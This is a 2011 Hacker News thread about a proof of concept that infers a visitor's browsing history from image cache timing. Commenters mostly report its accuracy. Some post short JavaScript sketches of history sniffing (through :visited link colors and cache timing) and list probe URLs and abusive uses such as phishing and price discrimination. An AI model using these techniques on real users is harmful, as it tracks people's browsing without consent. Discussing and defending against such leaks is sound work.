Hacker News
I too know the websites you visited (oxplot.github.com)
187 points by oxplot on Dec 3, 2011 | hide | past | favorite | 93 comments


Throwaway account. My company created an analytics product around the ability to track which sites your visitors have visited. It used a different and (at the time) more reliable technique.

About a year after the product launched, we were contacted by a powerful Washington-based lobby group who wanted to chat. They felt it violated a site visitor's "reasonable expectation of privacy". I agreed. So we pulled the feature and dodged a bullet, as this "browser bug" hit the mainstream press a few months later. The feature wasn't a major part of our product's value prop; few of our customers used it and none missed it.

So if you're thinking about basing a startup on this, don't. You will very quickly get a call from organizations much larger than you, asking awkward questions.


I wonder if they have contacted Facebook about some of their practices, which may be similar?


Related, an advertising company who was accused of tracking history: http://cyberlaw.stanford.edu/node/6695


Open-source it?


I'm sure it's the trick where you make a bunch of links to various sites, set a :visited color, and then interrogate all of the links with javascript to see what color they are. It's no longer possible on most browsers.
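For reference, that classic trick can be sketched roughly like this (a hypothetical illustration, not the PoC's actual code; modern browsers now deliberately report the unvisited color from getComputedStyle, so this no longer works):

```javascript
// Classic :visited history-sniffing sketch (now blocked by modern browsers).

// Pure helper: does the rendered color match the color we styled
// :visited links with?
function looksVisited(renderedColor, visitedColor) {
  return renderedColor === visitedColor;
}

// Browser-only part: inject a :visited rule, create links, and
// interrogate their computed color.
function sniffHistory(urls) {
  const visitedColor = 'rgb(255, 0, 0)';
  const style = document.createElement('style');
  style.textContent = 'a:visited { color: ' + visitedColor + '; }';
  document.head.appendChild(style);

  return urls.filter(function (url) {
    const a = document.createElement('a');
    a.href = url;
    document.body.appendChild(a);
    const color = getComputedStyle(a).color;
    document.body.removeChild(a);
    return looksVisited(color, visitedColor);
  });
}
```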


Somehow I think with a throwaway account that's probably not likely.


Not even close. While I had indeed visited all the sites it said I visited, it missed tons of other sites I'd visited.


It said I have not visited any of them, except google (there it just says "whoops", I'm not sure if that is a hit or not).


Yup, got the same. Then rerunning it said I'd visited almost all of the sites.


You'd expect that, as it works by loading an image from each of those sites.

So your cache will end up with images from each of those sites.


I get what you're saying, but if the technique really worked, I'd expect it to have told me the sites I frequently visit on the first run and a 100% score on the second run, but it was only like 80% of that.


Same here on iPad.


Same here. Zero false positives, but several false negative results.


Same here, it failed to catch Google and I am there almost daily. (Mostly for the doodles.)


Same here. Funny thing is that all correct matches were for sites actually open in another tab, and it even missed Facebook, which was also open in a tab.


Same here. There were 3 correct positives listed, and I had about 7 or 8 false negatives.


Same here. Although I visited multiple of the listed sites in this very session, in the browser I have open, the tool only reported one as visited, and Google as a "whoops". It should have reported at least 6 more!


I think it got 100% for me, on Safari/Mac.

Note that it doesn't need to be 100% accurate to be effective. If it guesses better than 50% (i.e. coin flip), then it could be used to give guesses with at least some confidence. No different than analyzing any other noisy dataset. Because this all works client-side, it can also be done quite invisibly.


Right, but those applications will be for things like online advertising, which is already tracking your visits and/or just assuming you use the popular sites anyway. Can this be used to violate privacy in a meaningful manner if it misses 50% or more of the time? You'd have complete plausible deniability if you were pinned to have accessed some site you don't want people to know you accessed. It can't be used as evidence in anything. What would the threat look like?


I oppose user tracking not necessarily because there's something to hide, but because a sense of privacy is a fundamental component of a sense of independence, and for me, independence is one of the critical components of happiness.


It would have to guess better than anonymous modelling, not 50%. I'd happily bet at even odds that each of my site visitors has visited Google.


If the question is "Has this user visited site X?" then I'd hope that any kind of modelling is better than 50%, as simulating a coin toss would be at least as good.


There are already better and more reliable methods to accomplish the same goal, e.g.:

http://ajaxian.com/archives/spyjax-using-avisited-to-test-yo...


I was under the impression that attempts had been made to hide any effects of :visited styles on the accessible DOM to stop this from working. There's a particularly good article on Mozilla's attempts [1], and the relevant bug on Bugzilla. [2]

[1]: http://dbaron.org/mozilla/visited-privacy

[2]: https://bugzilla.mozilla.org/show_bug.cgi?id=147777


There's another trick you can use, for detecting if somebody is logged in to certain sites. See:

https://grepular.com/Abusing_HTTP_Status_Codes_to_Expose_Pri...

Although, the Google test on that page is currently broken. The Facebook and Twitter ones aren't.


Apparently the key to people not knowing where you visited is to use IE. It missed sites like Twitter and Facebook that are open for me all the time. It did get one site correct, HN ;<).


It guessed HN correctly for me the first time, but on the second run it said I hadn't visited any of the sites, including HN. Perhaps a bug..


What would be a possible use of this attack? I can't think of anything useful you'd do with knowing that you've visited Facebook. And so many people use sites like Facebook you might get a better success rate just always returning "visited" rather than measuring this way!


If a malicious website can tell which banking websites you have visited, it can show a phishing page that looks just like your bank.


Maybe you could use it to only show those social sharing widgets that are for services the visitor actually uses. Though I guess WebIntents will eventually be a better way to handle that.


Ad retargeting without going through one of the high-reach ad networks. Or any product site instantly knowing which competitors you've researched, and tailoring their pricing to that.


Old but related: Using your browser URL history to estimate gender http://www.mikeonads.com/2008/07/13/using-your-browser-url-h...

Seems like I'm 50% male, 50% female :D


That's because the CSS trick it uses doesn't work any more.

It would be interesting if someone updated it to use this new trick or even just as a Chrome extension.


Nope. Only got 1 right.

Best of luck, it's an interesting concept!


It's kind of comforting to see the fails here...


Again, this seems to be inaccurate for a large number of people. Can we take these two attempts as evidence that it is hard for malicious websites to discern our browser history?


With the exception of Facebook (which I visited this morning), the results were accurate (Amazon, reddit, linkedin, wikipedia, youtube). Spoooky!


Said I hadn't visited any of the sites, except HN (which is easy to guess since news.ycombinator.com will be in the HTTP_REFERER field...).

If I re-run the test it still gets some sites wrong (says I haven't visited them when in fact I have). It even claims I haven't visited Amazon both times when in fact it's open in another tab.


I just tried it twice, once on a public wi-fi network. And then again when I got home. It worked very well on the public wifi, and had many false positives at home.

It seems to work better on slower internet connections. The script calls a site "visited" if the response time of the potentially cached image is less than 1/20 the time of the certainly uncached image.

On slow connections the cached load is much faster than the uncached one. On fast connections it's only slightly faster. However, the known-uncached images sometimes show a "10x increase in latency", so based on my (and others') experience, this is a major problem.

One could attempt to normalize this for the sites where appending a random query string causes higher latency. Simply precalculate the added latency from images with the random query string on a per-site basis, then subtract it from "uncachedTime".
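The heuristic described above could be sketched like this (my own illustration based on the thread's description, not the PoC's actual source; `queryPenalty` is an assumed name for the proposed per-site latency correction):

```javascript
// Sketch of the cache-timing heuristic described above.
// cachedTime:   load time of the image as normally referenced (may be cached)
// uncachedTime: load time of the same image with a random query string
//               appended (guaranteed cache miss)
// queryPenalty: extra latency some servers add when a query string is
//               present, precalculated per site (assumed correction)
function classifyVisit(cachedTime, uncachedTime, queryPenalty) {
  const corrected = Math.max(uncachedTime - (queryPenalty || 0), 0);
  // Per the description: "visited" if the possibly-cached load takes
  // less than 1/20 of the known-uncached load.
  return cachedTime < corrected / 20 ? 'visited' : 'not visited';
}

// Browser-only measurement helper (not runnable outside a browser):
// time how long an image takes to load.
function timeImageLoad(url) {
  return new Promise(function (resolve) {
    const start = Date.now();
    const img = new Image();
    img.onload = img.onerror = function () { resolve(Date.now() - start); };
    img.src = url;
  });
}
```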


Doesn't appear to guess correctly in Chrome 15 on OS X (10.7.2). I'm not sure exactly what the 'whoops' means for google - but I've obviously visited HN and have visited a few of the others as well.

Screenshot: http://cl.ly/1i0921270W2b1u190b0W


Didn't work on Opera on Linux (said I never visited any of those sites)


RequestPolicy prevents that approach.


Damn right. Don't hand out cookies to strangers unless you're a Girl Scout.


The images:

  facebook: 'https://s-static.ak.facebook.com/rsrc.php/v1/yJ/r/vOykDL15P0R.png',
  twitter: 'https://twitter.com/images/spinner.gif',
  digg: 'http://cdn2.diggstatic.com/img/sprites/global.5b25823e.png',
  reddit: 'http://www.redditstatic.com/sprite-reddit.pZL22qP4ous.png',
  hn: 'http://ycombinator.com/images/y18.gif',
  stumbleupon: 'http://cdn.stumble-upon.com/i/bg/logo_su.png',
  wired: 'http://www.wired.com/images/home/wired_logo.gif',
  ...


Really interesting concept. This one wasn't as accurate for me as the original Firefox-specific proof of concept, though. It only picked up on YouTube and Wikipedia. What's with the "whoops" on Google?

I do use NoScript and Ghostery, though, and I could see how that might cause some false negatives.


When the script is run a second time, it shows that every site was visited. After the first run, I guess everything is cached and it can't tell a hit from a miss :)

Running in Chrome's incognito mode is a bit different though; only 7 show up as cached the first time it's run.


It said "not visited" for EVERYTHING, except google which says "whoops". I have visited nearly all of them in the last 2 months.

But don't despair, I have some of the most hostile browser settings: I run RequestPolicy, NoScript, and Flashblock.


Same results here, and I'm not running any of the things you mentioned; also been to many of those sites, within the past few days in many cases. I'm basically on stock Chrome (though I do have Adblock).


Same for me. I then opened facebook in a tab, reran it and it said I had visited every site except facebook.


Safari with adblock and ghostery here, got 8 correct and 18 false positives.


Interesting concept, but I'm quite certain that I haven't only been on xkcd.

http://dispatched.ch/pic/visipisi-20111203-214939.jpg


Mostly right for me except it didn't know I visited twitter and facebook (both tabs are open right now).

That's probably due to me blocking facebook and twitter widgets on sites other than Fb and twitter though.


In my case, the ones it got wrong were the images that returned a 304 (not changed) header since they returned significantly faster than fetching the full image.


It said no to sites I had visited. Unless that is what it was programmed to do, I'd say it did not work. You can message me for any other info about the test.


From the 5 sites I visited, it correctly flagged HN, WP and YT as visited, and gave a "whoops" for FB and Google (what does that mean?), which I both visited.


I got extremely inconsistent answers on multiple runs.


Indeed, as the second time you run it, you have visited all those sites, and some of those images are in the cache.

The first time, I had one 'visited', the second time about half were 'visited'. I'm surprised not all of them were, though...


No, you don't. One false positive, many whoops, quite a few false negatives. After calling the script a second time, almost all guesses were wrong.


Apparently I haven't visited HN. :)

I wonder if the use of ghostery, no-script, that sort of thing, is what bamboozles it? Overall, it looks like it's guessing.


Completely wrong. Said I visited some I haven't heard of, whoops on Google, and not visited on most of those that I've been to recently.


It got all of them right for me (Chrome, Windows XP) except for twitter. I got a "whoops" for google multiple times.


Big miss for Twitter, but cool idea anyway.


The results are not consistent. Each time I click the button it keeps changing and also lists the wrong sites.


A second try gives me a 'visited' result on almost every page (except techbuy).

The first try was pretty correct though.


It only got 4 out of 15 correct for me.


It says I've visited HN and Slashdot. I haven't been to slashdot this year, but I did go to facebook...


Dead on for me. Chrome under Ubuntu.


Did not work at all for me. The other one had slightly better results. Win 7 on most recent FF.


Got only 1 for me- youtube.

Several others it said I didn't visit but I did.

And it said I visited linkedin, and I didn't.


Interesting. Twitter and HN yes, Facebook and LinkedIn no. Chromium on Debian.


I'm on Firefox 9.

For all the entries I got "not visited", even though I visit a lot of them.


Extremely wrong on Chrome. The first time I ran it, it said I had not visited any of them. Google and HN were definitely browsed today.

Ran it again, ALL of them appeared visited. Even sites like abebooks, which I have not visited at all.


That's because the second time you ran it, all the images were in your cache from the first time you ran it. That's the expected result.


Yet another reason this test is useless. If site A uses it, it may get partially correct data, but when you browse to site B, it will return 100% positive, most of these being false positives.

I just don't see any practical application for this method with such high error rates. The methods mentioned above are only valuable if you can guarantee at least relative reliability. By and large the results have been seemingly random, with only one or two persons reporting 100% correctness. So what's the difference between running a test with wildly unreliable results and just doing something randomly?


First, it's a proof of concept, that's all.

Even so, even without doing any work to ameliorate these flaws, it could still be (ab)used. Don't assume that it's only useful if everyone can scan which of the top 100 websites you've visited.

Any site could use this to check which competitors' sites have been visited. It's unlikely anyone else has an interest in checking that information, so the cache is not going to be poisoned by anyone else. With knowledge of which competitors a potential customer has checked out, you could do some effective price discrimination -- the guy looking at the $10 solutions sees your lowest price, while the guy looking at some competing Microsoft Dynamics package enters a more enterprisey sales funnel.

It's also useful for retargeting. Throw the code up on an ad network and you only test for cache hits against domains of current advertisers. If there's a hit, store it in a cookie so you don't need to check the (now filled) cache again. You can now show ads for companies a person has already had an interaction with, without having to cookie every visitor to the advertisers' sites first.

It doesn't take much to come up with (mostly nefarious) uses for this, even without perfect accuracy and even without the ability to have multiple parties check the same URLs.

It also doesn't take much to come up with ways to improve the process. You can ameliorate the problem of overlapping testers by having a large pool of URLs from each site to check. The average top 1000 site probably has dozens and dozens of images and other resources per page, each of which can be used for a cache test.
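The pooling idea could look something like this (a sketch under my own assumptions; `majorityVisited` and the per-site resource lists are hypothetical names for illustration, not from the original PoC):

```javascript
// Sketch: test several resources per site and take a majority vote,
// so one poisoned or already-cached image doesn't decide the result.
// The per-site URL lists here are hypothetical examples.
const resourcePool = {
  'example-competitor.com': [
    'http://example-competitor.com/logo.png',
    'http://example-competitor.com/sprite.png',
    'http://example-competitor.com/css/main.css',
  ],
};

// results: array of booleans, one per tested resource (true = cache hit).
// The site is deemed "visited" only if more than half the resources hit.
function majorityVisited(results) {
  const hits = results.filter(Boolean).length;
  return hits > results.length / 2;
}
```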


First of all, I was explaining my experience. Second, I know it is a proof of concept. Still, I don't think it really proves the concept, since the results are not reliable at all. A proof of concept needs to give reliable results; hence, a proof.


Three false negative, one false positive, and one "whoops".


Guessed all of mine correctly with Chrome on Mac. Scary.


The other one worked fine on iOS. Yours failed all tests.


Got it mostly right initially. I then visited Facebook (which it said I hadn't been to), and it then told me I had visited ALL the websites (except Facebook).


That makes sense though (mostly): after you test once, all the images are cached for the second run.


Nice trick; though it's a once in a cache-time event.


Got three - one false positive. Firefox on linux


only got HN for me, using Chrome 15 on OSX.


Fails for me on Safari 5.1.2 / OS X. It got 1 site right, 1 site wrong, the rest being "not visited".


Not even close here, too. Instead of measuring load time, you can create "<a>" elements and verify their rendered color is the color you defined for visited links. It's an old trick...


a trick that all modern browsers have fixed


Hmm, I thought it was impossible to block that solution, since a coder should be able to get the computed value of a style property. I'll try it soon.


More accurate but a couple of false positives.

Chromium on Linux



as mentioned elsewhere in this thread, that loophole has been closed by all modern browsers. not to say there aren't other ways to get at that information, but it's not as simple as checking the color of a link anymore.


Missed about 75% for me.


try running it again. it will say you visited them all !

script FAIL !



